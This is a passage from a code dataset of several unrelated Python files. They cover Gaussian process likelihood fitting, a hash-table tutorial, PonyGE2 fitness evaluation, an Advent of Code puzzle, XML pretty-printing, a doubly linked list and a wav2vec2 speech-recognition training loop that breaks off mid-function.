MercerKernel\nfrom ortho.basis_functions import (\n Basis,\n # OrthonormalBasis,\n smooth_exponential_basis_fasshauer,\n)\n\n# from ortho.orthopoly import OrthogonalBasisFunction, OrthogonalPolynomial\n# import matplotlib.pyplot as plt\nfrom typing import Tuple, Callable\nfrom termcolor import colored\n\ntorch.autograd.set_detect_anomaly(True)\ntorch.set_printoptions(linewidth=300)\nimport matplotlib.pyplot as plt\nfrom typing import Tuple\n\n\nclass TermGenerator:\n def __init__(\n self,\n input_sample: torch.Tensor,\n output_sample: torch.Tensor,\n kernel: MercerKernel,\n ):\n \"\"\"\n Stores terms used in the calculation of gradients for the likelihood.\n\n The gradient terms for the likelihood have the following structure:\n dL/dθ = 0.5 * (y'K^{-1}dK/dθK^{-1}y - tr(K^{-1}dK/dθ))\n\n Note however that since the kernel is written ΦΛΦ', and the first time\n is 1x1, we can calculate the first term as:\n 0.5 * z' δΛ/δθ\n\n where z = {(Φ'K^-1y)^2}_i, by a trace trick.\n Opening the WSM formula for the kernel inverse, we get:\n ΦK^-1y = Φ'y - Φ'Φ(Φ'Φ + Λ^-1)^-1Φ'y\n = (I - Φ'Φ(Φ'Φ + Λ^-1)^-1)Φ'y\n The terms:\n - Φ'y\n - Φ'Φ\n can be pre-computed, so that the final iteration requires\n only :\n - calculation of (Φ'Φ + Λ^-1)^{-1}\n - multiplication of Φ'Φ with that matrix\n - subtraction from the identity\n - inner product of the result with Φ'y\n\n This class offers getter methods for precalculated terms in order to\n speed up the calculation, and is constructed once on initialisation of\n the likelihood.\n \"\"\"\n self.input_sample = input_sample\n self.output_sample = output_sample\n self.kernel = kernel\n self.order = self.kernel.order\n\n # initialise\n self.phi_data = None\n self.phi_y_data = None\n self.phi_phi_data = None\n\n @property\n def phi_y(self) -> torch.Tensor:\n \"\"\"\n Returns the matrix Φ'y.\n \"\"\"\n if self.phi_y_data is None:\n self.phi_y_data = (\n self.kernel.basis(self.input_sample).T @ self.output_sample\n )\n return self.phi_y_data\n\n @property\n def phi_phi(self) -> torch.Tensor:\n \"\"\"\n Returns the matrix Φ'Φ.\n \"\"\"\n if self.phi_phi_data is None:\n self.phi_phi_data = self.phi.T @ self.phi\n return self.phi_phi_data\n\n @property\n def phi(self) -> torch.Tensor:\n if self.phi_data is None:\n self.phi_data = self.kernel.basis(self.input_sample)\n\n return self.phi_data\n\n def get_vector_term(\n self, eigenvalues: torch.Tensor, noise: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n Returns the term:\n z = {(Φ'K^-1y)^2}_i - (Φ'K^-1Φ)_ii\n for the inverse. Then, z' δΛ/δθ is the gradient for the parameter.\n\n This is because tr(AD) = diag(A)'diag(D), where D is diagonal,\n as an inner product between the vectors that comprise the diagonals\n of the matrix, when D is diagonal.\n \"\"\"\n # calculate the inverse\n inverse = torch.inverse(\n self.phi_phi + noise**2 * torch.diag(1 / eigenvalues)\n )\n intermediate_term = (1 / noise**2) * (\n torch.eye(self.order) - self.phi_phi @ inverse\n )\n\n data_term = ((intermediate_term @ self.phi_y) ** 2).squeeze()\n\n trace_term = torch.diag(intermediate_term @ self.phi_phi).squeeze()\n return 0.5 * (data_term - trace_term)\n\n def get_noise_term(self, eigenvalues: torch.Tensor, noise: torch.Tensor):\n \"\"\"\n To get the noise term gradient, we use the fact that the\n \"\"\"\n inverse = torch.inverse(\n self.phi_phi + noise**2 * torch.diag(1 / eigenvalues)\n )\n intermediate_term = (1 / noise**2) * (\n torch.eye(self.input_sample.shape[0])\n - self.phi @ inverse @ self.phi.T\n )\n data_term = (\n noise\n * torch.sum(\n (intermediate_term @ self.output_sample) ** 2\n ).squeeze()\n )\n trace_term = noise * torch.trace(intermediate_term).squeeze()\n return (data_term - trace_term).squeeze()\n\n\nclass Likelihood:\n def __init__(\n self,\n order: int,\n kernel: MercerKernel,\n input_sample: torch.Tensor,\n output_sample: torch.Tensor,\n eigenvalue_generator: EigenvalueGenerator,\n param_learning_rate: float = 0.00001,\n sigma_learning_rate: float = 0.00001,\n memoise=True,\n optimisation_threshold=0.000001,\n ):\n \"\"\"\n Initialises the Likelihood class.\n\n To use this, construct an instance of a torch.optim.Optimizer;\n register the parameters that are to be optimised, and pass it when\n instantiating this class.\n\n Parameters:\n order: The bandwidth of the kernel/no. of basis functions.\n basis: a Basis object that allows for construction of the various\n matrices.\n input_sample: The sample of data X.\n output_sample: The (output) sample of data Y.\n mc_sample_size=10000:\n \"\"\"\n # hyperparameters\n self.order = order\n self.kernel = kernel\n self.input_sample = input_sample\n self.output_sample = output_sample\n self.eigenvalue_generator = eigenvalue_generator\n self.memoise = memoise\n\n # learning rates\n self.param_learning_rate = param_learning_rate\n self.sigma_learning_rate = sigma_learning_rate\n\n # convergence criterion\n self.epsilon = optimisation_threshold\n self.term_generator = TermGenerator(\n input_sample, output_sample, kernel\n )\n\n def fit(\n self,\n initial_noise: torch.Tensor,\n parameters: dict,\n max_iterations=30000,\n verbose=True,\n ) -> Tuple[torch.Tensor, dict]:\n \"\"\"\n Returns a dictionary containing the trained parameters.\n\n The noise parameter, as trained is equal to \"σ^2\" in the standard\n formulation of the noise variance for the Gaussian process.\n\n We do this because the parameter is never evaluated as σ.\n \"\"\"\n converged = False\n trained_noise = initial_noise.clone().detach()\n trained_parameters = parameters.copy()\n iterations = 0\n while not converged and iterations < max_iterations:\n # Get the gradients\n noise_gradient, parameters_gradients = self.get_gradients(\n trained_parameters, trained_noise\n )\n\n # update the parameters\n trained_noise.data += self.sigma_learning_rate * noise_gradient\n if verbose:\n if iterations % 500 == 0:\n print(\"Iteration: {}\".format(iterations))\n print(\"Order:\", self.order)\n print(\n \"Noise gradient:\",\n colored(noise_gradient, \"green\"),\n end=\"\",\n )\n print(\n \"Noise value\",\n colored(trained_noise.data**2, \"magenta\"),\n )\n\n # it may be better as a tensor of parameter values...\n for param in trained_parameters:\n if verbose:\n if iterations % 500 == 0:\n print(\n \"param gradient for: {}\".format(param),\n colored(parameters_gradients[param], \"blue\"),\n end=\"\",\n )\n print(\n \"param value for: {}\".format(param),\n colored(parameters[param], \"red\"),\n )\n trained_parameters[param].data += (\n self.param_learning_rate * parameters_gradients[param]\n )\n\n # having updated parameters and noise values, change on the kernel\n # self.update_kernel_parameters(trained_parameters, trained_noise)\n\n # check the criterion\n \"\"\"\n TEMPORARY SUBSTITUTION: WE WILL JUST USE NOISE AS THE CRITERION\n \"\"\"\n converged = (\n torch.abs(noise_gradient) * self.sigma_learning_rate * 100\n < self.epsilon\n )\n # converged = (torch.abs(noise_gradient) < self.epsilon) and (\n # torch.Tensor(\n # [\n # torch.abs(gradient) < self.epsilon\n # for gradient in parameters_gradients.values()\n # ]\n # )\n # ).all()\n iterations += 1\n if iterations % 500 == 0:\n print(\"Iteration: {}\".format(iterations))\n\n if converged:\n print(\"Converged!\")\n self.converged = True\n else:\n self.converged = False\n print(\"Not converged: {} iterations completed.\".format(iterations))\n final_eigenvalues = self.eigenvalue_generator(trained_parameters)\n print(\"final eigenvalues:\", final_eigenvalues)\n experiment_order = sum(\n torch.where(\n final_eigenvalues\n > (trained_noise / self.input_sample.shape[0]),\n torch.ones(final_eigenvalues.shape),\n torch.zeros(final_eigenvalues.shape),\n )\n )\n print(\"estimated optimal order:\", experiment_order)\n return trained_noise, trained_parameters\n\n def get_gradients(\n self, parameters: dict, noise: torch.Tensor\n ) -> Tuple[torch.Tensor, dict]:\n \"\"\"\n Returns the gradient of the log-likelihood w.r.t the noise parameter\n and the parameters tensor.\n\n Because the calculation of the kernel inverse is ostensibly expensive,\n the kernel inverse is calculated at the top of the \"computational graph\"\n and passed in to the functions that will then call the TermGenerator\n to construct respective gradient terms.\n\n output shapes:\n sigma_grad: [1]\n params_grad: [b x 1]\n \"\"\"\n eigenvalues = self.eigenvalue_generator(parameters)\n\n # get the terms\n noise_gradient = self.term_generator.get_noise_term(eigenvalues, noise)\n vector_term = self.term_generator.get_vector_term(eigenvalues, noise)\n parameters_gradients: dict = self.parameters_gradient(\n vector_term, parameters\n )\n return noise_gradient, parameters_gradients\n\n def noise_gradient(\n self,\n kernel_inverse: torch.Tensor,\n parameters: dict,\n noise: torch.Tensor,\n ) -> torch.Tensor:\n \"\"\"\n Returns the gradient of the log-likelihood w.r.t the noise parameter.\n\n Code in here will calculate the appropriate terms for the gradients\n by calling the appropriate methods in the TermGenerator class.\n\n Returns a tensor scalar containing the gradient information for\n the noise parameter.\n\n The key difference between this and the param_gradient function\n is that in there the corresponding einsum must take into account the\n extended shape of the parameters Tensor.\n\n Because the kernel inverse is common to all terms, we precompute this\n and pass it as an argument, for efficiency.\n \"\"\"\n # get the terms\n sigma_gradient_term = 2 * noise * torch.eye(self.input_sample.shape[0])\n\n data_term = 0.5 * torch.einsum(\n \"i, ij..., jk..., kl..., l ->\",\n self.output_sample, # i\n kernel_inverse, # ij\n sigma_gradient_term,\n kernel_inverse, # kl\n self.output_sample, # l\n )\n trace_term = 0.5 * torch.trace(kernel_inverse @ sigma_gradient_term)\n\n return (data_term - trace_term).squeeze() # the whole noise gradient\n\n def parameters_gradient(\n self,\n term_vector: torch.Tensor,\n parameters: dict,\n # trained_noise: torch.Tensor,\n # eigenvalues: torch.Tensor,\n ) -> dict:\n \"\"\"\n Returns the gradient of the negative log likelihood w.r.t the\n parameters.\n\n Code in here will calculate the appropriate terms for the gradients\n by calling the appropriate methods in the TermGenerator class.\n\n Returns a tensor containing the gradient information for each of the\n values in the parameter tensor.\n\n The gradient of the likelihood with respect to the parameters θ is:\n dL/dθ = 1/2 y' K^-1 dK/dθ K^-1 y - 1/2 Tr(K^-1 dK/dθ)\n\n where dK/dθ is the matrix of derivatives of the kernel with respect to\n the given parameter. The Mercer form of the kernel means that\n this is essentially the same as the kernel, with eigenvalues set as\n the derivative of the eigenvalues:\n dK/dθ = Φ \\hat{Λ}' Φ'\n\n where \\hat{Λ} = diag(dλ_1/dΘ, ..., dλ_n/dθ) and Φ is the matrix of\n eigenfunction evaluations.\n\n That is, generating the matrix derivative term dK/dθ is equivalent to\n evaluating the kernel with eigenvalue vectors represented by the\n derivatives of the eigenvalues with respect to the parameter.\n\n input_shape:\n kernel_inverse: [n x n]\n parameters: [b x 1]\n output:\n a dictionary, with each key in \"parameters\"\n having a corresponding value of shape [b x 1]\n which is the gradient of the eigenvalues with\n respect to that parameter.\n \"\"\"\n # parameter_gradients is a dictionary of the same keys as parameters\n parameter_gradients = parameters.copy()\n\n eigenvalue_derivatives = self.eigenvalue_generator.derivatives(\n parameters\n ) # the dictionary\n\n # For each of the parameters, take the gradient given by the eigenvalue\n # generator and get the vector of values from the term_generator.\n # Then, for each of the parameters, inner-product the term generator\n # vector\n for param in parameters:\n # get the vector of eigenvalue derivatives for this parameter\n eigenvalue_derivative_vector = eigenvalue_derivatives[param]\n parameter_gradients[param] = (\n term_vector @ eigenvalue_derivative_vector\n )\n\n return parameter_gradients\n\n\ndef optimise_explicit_gradients(\n y: torch.Tensor,\n x: torch.Tensor,\n b: torch.Tensor,\n sigma: torch.Tensor,\n objective: Callable,\n epsilon: float,\n sample_size: int,\n param_learning_rate: float = 0.0001,\n sigma_learning_rate: float = 0.0001,\n):\n \"\"\"\n Optimises the likelihood w.r.t sigma, b using explicit gradients.\n\n It does this by waiting for a criterion value to\n be less than epsilon. The gradients are calculated explicitly.\n The gradients are handled in functions:\n - determinant_gradients\n - inverse_kernel_gradients\n\n See their signatures and bodies for more information.\n \"\"\"\n pass\n\n # functions that currently exist:\n # [F] optimise_explicit_gradients\n # [F] determinant_gradients ->\n # gets gradients for sigma and b from the det term\n # [F] inverse_kernel_gradients ->\n # gets gradients for sigma and b from the kernel inverse term\n # [F] kernel -> returns the Gram matrix of the kernel at x, x'\n # [F] evaluate_negative_log_likelihood -> evaluates the Gaussian log\n # likelihood.\n # [F] build_ground_truth -> (input_sample, noise_distribution, true_function,\n # sample_size)\n # [F] run_experiment -> returns\n\n\ndef get_tabulated_data(\n trained_noise: torch.Tensor,\n trained_parameters: dict,\n noise_gradient: torch.Tensor,\n parameters_gradients: dict,\n):\n \"\"\"\n Given the parameters and their gradients (as well as corresponding values\n for the noise parameter), tabulates the information in a presentable way\n for the repetition in the likelihood fitting.\n \"\"\"\n data = [\n \"_\",\n *trained_parameters.values(),\n \"_\",\n *parameters_gradients.values(),\n ]\n headers_list = [\n \"Values:\",\n *trained_parameters.keys(),\n \"Gradients:\",\n *parameters_gradients.keys(),\n ]\n # data = tabulate(data, headers=headers_list, tablefmt=\"grid\")\n\n # data = parameters_gradients.copy()\n # headers = [\n # \"Values:\",\n # *trained_parameters.keys(),\n # ]\n # data2 =\n return data\n\n\nif __name__ == \"__main__\":\n plot = True\n # data setup\n sample_size = 1000\n input_sample = D.Normal(0, 4).sample((sample_size,))\n true_noise_parameter = torch.Tensor([0.3])\n print(\"check input_sample\")\n\n # generate the ground truth for the function\n def test_function(x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n The test function used in an iteration of Daskalakis, Dellaportas and\n Panos.\n \"\"\"\n return (1.5 * torch.sin(x) + 0.5 * torch.cos(4 * x) + x / 8).squeeze()\n\n output_sample = (\n test_function(input_sample)\n + D.Normal(0, true_noise_parameter).sample((sample_size,)).squeeze()\n )\n\n print(\"check output_sample\")\n\n # kernel setup\n order = 7\n eigenvalues = torch.ones(order, 1)\n parameters = {\n \"ard_parameter\": torch.Tensor([1.0]),\n \"precision_parameter\": torch.Tensor([1.0]),\n \"noise_parameter\": torch.Tensor([0.5]),\n \"variance_parameter\": torch.Tensor([1.0]),\n }\n basis_function = smooth_exponential_basis_fasshauer # the basis function\n basis = Basis(basis_function, 1, order, parameters)\n kernel = MercerKernel(order, basis, eigenvalues, parameters)\n\n eigenvalue_generator = SmoothExponentialFasshauer(order)\n\n likelihood = Likelihood(\n order,\n kernel,\n input_sample,\n output_sample,\n eigenvalue_generator,\n )\n\n if plot:\n x_axis = torch.linspace(-10, 10, 1000)\n # plot the function\n plt.plot(x_axis, test_function(x_axis), label=\"true function\")\n plt.scatter(\n input_sample.numpy(),\n output_sample.numpy(),\n label=\"sampled data\",\n color=\"black\",\n )\n plt.legend()\n plt.show()\n # initial_values for parameters:\n initial_noise = torch.Tensor([0.5])\n\n # now fit the parameters\n likelihood.fit(initial_noise, parameters)\n","repo_name":"wegreenall/mercergp","sub_path":"likelihood_refit.py","file_name":"likelihood_refit.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41053492613","text":"#hash tables are types of data structures those maps keywords to their values\n\n\n#dictionary\n\ncontacts={'john':10928,'mike':534653,'wayio':54775,'nick':73454}\nprint(contacts)\n\n\n#cascanded dictionary\n\nemployee={'classa':{'john':{'salary':54514314,'id':3,'rank':'casual'},\n 'dave':{'salary':75479,'id':3,'rank':'permanent'}\n }\n }\nprint(employee)\n\n\n#accessing keys in dictionary\n\nfor items in employee.values():\n print(items)\n\n\n#CONVERTING DICTIONARY INTO DATA FRAMES\n\n\nimport pandas as pd\ndf=pd.DataFrame(employee['classa'])#this will convert my data in tabular form\nprint(df)","repo_name":"ndurumo254/python-basic","sub_path":"hash tables.py","file_name":"hash tables.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"333327002","text":"import numpy as np\n\nfrom algorithm.parameters import params\nfrom stats.stats import stats\nfrom utilities.stats.trackers import cache, runtime_error_cache\n\n\ndef evaluate_fitness(individuals):\n \"\"\"\n Evaluate an entire population of individuals. Invalid individuals are given\n a default bad fitness. If params['CACHE'] is specified then individuals\n have their fitness stored in a dictionary called utilities.trackers.cache.\n Dictionary keys are the string of the phenotype.\n There are currently three options for use with the cache:\n 1. If params['LOOKUP_FITNESS'] is specified (default case if\n params['CACHE'] is specified), individuals which have already been\n evaluated have their previous fitness read directly from the cache,\n thus saving fitness evaluations.\n 2. If params['LOOKUP_BAD_FITNESS'] is specified, individuals which\n have already been evaluated are given a default bad fitness.\n 3. If params['MUTATE_DUPLICATES'] is specified, individuals which\n have already been evaluated are mutated to produce new unique\n individuals which have not been encountered yet by the search\n process.\n\n :param individuals: A population of individuals to be evaluated.\n :return: A population of fully evaluated individuals.\n \"\"\"\n\n results, pool = [], None\n\n if params['MULTICORE']:\n pool = params['POOL']\n\n for name, ind in enumerate(individuals):\n ind.name = name\n\n # Iterate over all individuals in the population.\n if ind.invalid:\n # Invalid individuals cannot be evaluated and are given a bad\n # default fitness.\n ind.fitness = params['FITNESS_FUNCTION'].default_fitness\n stats['invalids'] += 1\n\n else:\n eval_ind = True\n\n # Valid individuals can be evaluated.\n if params['CACHE'] and ind.phenotype in cache:\n # The individual has been encountered before in\n # the utilities.trackers.cache.\n\n if params['LOOKUP_FITNESS']:\n # Set the fitness as the previous fitness from the\n # cache.\n ind.fitness = cache[ind.phenotype]\n eval_ind = False\n\n elif params['LOOKUP_BAD_FITNESS']:\n # Give the individual a bad default fitness.\n ind.fitness = params['FITNESS_FUNCTION'].default_fitness\n eval_ind = False\n\n elif params['MUTATE_DUPLICATES']:\n # Mutate the individual to produce a new phenotype\n # which has not been encountered yet.\n while (not ind.phenotype) or ind.phenotype in cache:\n ind = params['MUTATION'](ind)\n stats['regens'] += 1\n\n # Need to overwrite the current individual in the pop.\n individuals[name] = ind\n ind.name = name\n\n if eval_ind:\n results = eval_or_append(ind, results, pool)\n\n if params['MULTICORE']:\n for result in results:\n # Execute all jobs in the pool.\n ind = result.get()\n\n # Set the fitness of the evaluated individual by placing the\n # evaluated individual back into the population.\n individuals[ind.name] = ind\n\n # Add the evaluated individual to the cache.\n cache[ind.phenotype] = ind.fitness\n\n # Check if individual had a runtime error.\n if ind.runtime_error:\n runtime_error_cache.append(ind.phenotype)\n\n return individuals\n\n\ndef eval_or_append(ind, results, pool):\n \"\"\"\n Evaluates an individual if sequential evaluation is being used. If\n multi-core parallel evaluation is being used, adds the individual to the\n pool to be evaluated.\n\n :param ind: An individual to be evaluated.\n :param results: A list of individuals to be evaluated by the multicore\n pool of workers.\n :param pool: A pool of workers for multicore evaluation.\n :return: The evaluated individual or the list of individuals to be\n evaluated.\n \"\"\"\n\n if params['MULTICORE']:\n # Add the individual to the pool of jobs.\n results.append(pool.apply_async(ind.evaluate, ()))\n return results\n\n else:\n # Evaluate the individual.\n ind.evaluate()\n\n # Check if individual had a runtime error.\n if ind.runtime_error:\n runtime_error_cache.append(ind.phenotype)\n\n if params['CACHE']:\n # The phenotype string of the individual does not appear\n # in the cache, it must be evaluated and added to the\n # cache.\n\n if (isinstance(ind.fitness, list) and not\n any([np.isnan(i) for i in ind.fitness])) or \\\n (not isinstance(ind.fitness, list) and not\n np.isnan(ind.fitness)):\n # All fitnesses are valid.\n cache[ind.phenotype] = ind.fitness\n","repo_name":"PonyGE/PonyGE2","sub_path":"src/fitness/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"43"} +{"seq_id":"43083751103","text":"f = open('puzzle.txt', 'r')\nline = f.readline()\nf.close()\n\ncrubs_positions = [int(el) for el in line.split(\",\")]\nf.close()\n\nmax_pos = max(crubs_positions)\n\ntot_fuel = float('inf') # biggest number of all\npos_to_align = 0\n\nfor i in range(max_pos):\n current_tot_fuel = 0\n for el in crubs_positions:\n needed_fuel = abs(el - i)\n current_tot_fuel += needed_fuel\n if current_tot_fuel < tot_fuel:\n tot_fuel = current_tot_fuel\n pos_to_align = i\n\nprint(\"position to align is\", pos_to_align)\nprint(\"needed fuel is\", tot_fuel)\n","repo_name":"aldotele/advent_of_code","sub_path":"treachery_of_whales/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74536658050","text":"# Creating double linked list\nclass Node:\n def __init__(self, value=None):\n self.value = value\n self.next = None\n self.prev = None\n\n\nclass doubly_linked:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n def creation_doubly(self, nodevalue):\n node = Node(nodevalue)\n self.head = node\n self.tail = node\n return 'The double linked list has been created'\n\n def insertion(self, nodevalue, location):\n if self.head is None:\n print('the list is empty')\n\n else:\n # inserting at the beginning of the list\n newnode = Node(nodevalue)\n if location == 0:\n newnode.prev = None\n newnode.next = self.head\n self.head.prev = newnode\n self.head = newnode\n\n # at the end\n elif location == 1:\n newnode.next = None\n newnode.prev = self.tail\n self.tail.next = newnode\n self.tail = newnode\n else:\n tempnode = self.head\n index = 0\n while index < location - 1:\n tempnode = tempnode.next\n index += 1\n # note tempnode means curnode\n newnode.next = tempnode.next\n newnode.prev = tempnode\n newnode.next.prev = newnode\n # creating link between our newnode and next node\n tempnode.next = newnode\n\n def travasal(self):\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.head\n while curnode:\n print(curnode.value, end=' ')\n curnode = curnode.next\n\n def backward_travasal(self):\n\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.tail\n while curnode:\n print(curnode.value, end=' ')\n curnode = curnode.prev\n\n def searching(self, nodevalue):\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.head\n while curnode:\n if curnode.value == nodevalue:\n return curnode.value\n curnode = curnode.next\n return ' the value dose not exit in the list.'\n\n def deletion_node(self, location):\n if self.head is None:\n print('list is empty')\n\n else:\n if location == 0:\n # if it's the only node in list\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n # has more than one node in list\n self.head = self.head.next\n self.head.prev = None\n elif location == 1:\n # deletion at the end of list\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n # has more than one node in list\n self.tail = self.tail.prev\n self.tail.next = None\n # deletion at anywhere in the list\n else:\n curnode = self.head\n index = 0\n while index < location - 1:\n curnode = curnode.next\n index += 1\n curnode.next = curnode.next.next\n curnode.next.prev = curnode\n print('the node has been deleted')\n\n def delete(self):\n if self.head is None:\n print('list is empty')\n else:\n\n curnode = self.head\n while curnode:\n curnode.prev = None\n curnode = curnode.next\n self.head = None\n self.tail = None\n print('the DLL has been successfully deleted')\n\n\ndll = doubly_linked()\ndll.creation_doubly(5)\nprint([node.value for node in dll])\ndll.insertion(0, 0)\ndll.insertion(2, 1)\ndll.insertion(6, -3)\ndll.insertion(7, 2)\ndll.insertion(4, 3)\nprint([node.value for node in dll])\ndll.deletion_node(0)\ndll.deletion_node(1)\ndll.deletion_node(2)\ndll.deletion_node(-1)\nprint([node.value for node in dll])\ndll.travasal()\nprint('\\n')\ndll.backward_travasal()\nprint('\\n')\nprint(dll.searching(6))\ndll.delete()\nprint([node.value for node in dll])\n","repo_name":"Kylemercy/pythonProject","sub_path":"linked list/double linked list2.py","file_name":"double linked list2.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"19281423293","text":"from xml.dom.minidom import Document\n\ndef create_pretty_xml():\n # Create a new XML document and an element\n doc = Document()\n root_element = doc.createElement('root')\n doc.appendChild(root_element)\n\n # Add some child elements\n for i in range(3):\n child = doc.createElement('child')\n child.setAttribute('id', str(i))\n root_element.appendChild(child)\n\n # Generate a pretty-printed XML string\n pretty_xml_string = doc.toprettyxml(indent=\" \")\n\n print(doc.encoding)\n\n return pretty_xml_string\n\ndef save_to_file(filename, xml_content):\n # Save the pretty-printed XML to a file\n with open(filename, 'w', encoding='utf-8') as file:\n file.write(xml_content)\n\n# Create pretty XML\npretty_xml = create_pretty_xml()\nprint(pretty_xml)\n\n# Save to 'test.xml'\nsave_to_file('test.xml', pretty_xml)\n\nprint(\"XML saved to test.xml\")\n","repo_name":"mmatuszk/pyFlashCards","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14081844404","text":"# -*- coding: utf-8 -*-\n# test comment\nimport argparse\nimport os\nimport sys\nimport time\n\nimport random\nimport math\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nfrom tqdm import tqdm\nimport datasets_wav2vec2\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.utils.data import DataLoader\nimport torch.distributed as dist\n\nfrom utils import hparams as hp\nfrom utils.utils import log_config, fill_variables, adjust_learning_rate, load_model, create_masks, init_weight\nfrom Models.transformer_wav2vec2 import TransformerWav2vec2\n\nrandom.seed(77)\ntorch.random.manual_seed(777)\ntorch.cuda.manual_seed_all(777)\nnp.random.seed(777)\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef get_learning_rate(step, hp):\n warmup_step = hp.warmup_step #hp.warmup_step # 4000\n warmup_factor = hp.warmup_factor #hp.warmup_factor #10.0 # 1.0\n d_model = 256\n return warmup_factor * min(step ** -0.5, step * warmup_step ** -1.5) * (d_model ** -0.5)\n\ndef get_learning_rate_tristage(step):\n max_update = 80000\n phase_ratio = [0.1, 0.4, 0.5]\n final_lr_scale = 0.05\n init_lr_scale = 0.01\n\n peak_lr = 0.00003\n init_lr = init_lr_scale * peak_lr\n final_lr = final_lr_scale * peak_lr\n \n warmup_steps = int(max_update * phase_ratio[0])\n hold_steps = int(max_update * phase_ratio[1])\n decay_steps = int(max_update * phase_ratio[2])\n\n warmup_rate = (peak_lr - init_lr) / warmup_steps\n decay_factor = -math.log(final_lr_scale) / decay_steps\n\n # stage 0\n if step < warmup_steps:\n lr = init_lr + warmup_rate * step\n return lr\n \n offset = warmup_steps\n # stage 1\n if step < offset + hold_steps:\n lr = peak_lr\n return lr\n\n offset += hold_steps\n # stage 2\n if step <= offset + decay_steps:\n lr = peak_lr * math.exp(-decay_factor * step)\n return lr\n\n # stage 3\n return final_lr\n\ndef train_loop(model, optimizer, step, epoch, args, hp, rank, dataloader):\n scaler = torch.cuda.amp.GradScaler()\n src_pad = 0\n trg_pad = 0\n\n train_len = len(dataloader)\n local_time = time.time()\n device = f'cuda:{rank}'\n label_smoothing = True\n if hp.optimizer_type == 'Noam':\n if epoch >= hp.decay_epoch:\n lr = adjust_learning_rate(optimizer, epoch, hp.decay_epoch)\n else:\n if hp.lr_tristage:\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n else:\n lr = get_learning_rate(step//hp.accum_grad+1, hp)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n optimizer.zero_grad()\n for d in dataloader:\n text, wav_input, pos_text, pos_wav2vec2, text_lengths, wav2vec2_lengths = d\n\n text = text.to(device, non_blocking=True)\n wav_input = wav_input.to(device, non_blocking=True)\n pos_text = pos_text.to(device, non_blocking=True)\n pos_wav2vec2 = pos_wav2vec2.to(device, non_blocking=True)\n text_lengths = text_lengths.to(device, non_blocking=True)\n \n batch_size = wav_input.shape[0]\n \n if hp.decoder == 'LSTM':\n text_input = text\n src_mask, trg_mask = create_masks(pos_wav2vec2, pos_text)\n else:\n text_input = text[:, :-1]\n src_mask, trg_mask = create_masks(pos_wav2vec2, pos_text[:, :-1])\n\n with torch.cuda.amp.autocast(hp.amp): #and torch.autograd.set_detect_anomaly(True):\n if args.n_gpus > 1:\n dist.barrier()\n youtputs, ctc_outputs, attn_dec_dec, attn_dec_enc = model(wav_input, text_input, src_mask, trg_mask, step//hp.accum_grad+1)\n\n print('step {} {}'.format(step, train_len))\n print('batch size = {}'.format(batch_size))\n print('lr = {}'.format(lr))\n step += 1\n if hp.decoder != 'ctc':\n loss_att = 0.0\n # cross entropy\n if label_smoothing:\n if hp.decoder == 'LSTM':\n ys = text.contiguous().view(-1, 1)\n else:\n ys = text[:, 1:].contiguous().view(-1, 1)\n B, T, L = youtputs.shape\n #eps = 0.1\n log_prob = F.log_softmax(youtputs, dim=2)\n onehot = torch.zeros((B * T, L), dtype=torch.float).to(DEVICE).scatter_(1, ys, 1)\n onehot = onehot * (1 - 0.1) + (1 - onehot) * 0.1 / (youtputs.size(2) - 1)\n onehot = onehot.reshape(B, T, L)\n for i, t in enumerate(text_lengths):\n if hp.decoder == 'LSTM':\n len_t = t\n else:\n len_t = t - 1\n if hp.T_norm:\n loss_att += -(onehot[i, :len_t, :] * log_prob[i, :len_t, :]).sum() / len_t\n else:\n loss_att += -(onehot[i, :len_t, :] * log_prob[i, :len_t, :]).sum()\n loss_att /= batch_size\n else:\n ys = text[:, 1:].contiguous().view(-1)\n loss_att = F.cross_entropy(youtputs.view(-1, youtputs.size(-1)), ys, ignore_index=trg_pad)\n print(f'loss_att = {loss_att.item()}')\n\n\n if hp.decoder == 'ctc':\n predict_ts_ctc = F.log_softmax(ctc_outputs, dim=2).transpose(0, 1)\n loss_ctc = F.ctc_loss(predict_ts_ctc, text, wav2vec2_lengths, text_lengths, blank=0)\n print('loss_ctc = {}'.format(loss_ctc.item()))\n loss = loss_ctc\n elif hp.use_ctc:\n ## NOTE: ctc loss does not support fp16?\n predict_ts_ctc = F.log_softmax(ctc_outputs, dim=2).transpose(0, 1)\n loss_ctc = F.ctc_loss(predict_ts_ctc, text, wav2vec2_lengths, text_lengths, blank=0)\n print('loss_ctc = {}'.format(loss_ctc.item()))\n loss = (hp.mlt_weight * loss_att + (1 - hp.mlt_weight) * loss_ctc)\n else: \n loss = loss_att\n print('loss =', loss.item())\n if not torch.isnan(loss):\n if hp.amp:\n loss /= hp.accum_grad\n scaler.scale(loss).backward()\n if step % hp.accum_grad == 0:\n if hp.clip is not None:\n scaler.unscale_(optimizer)\n 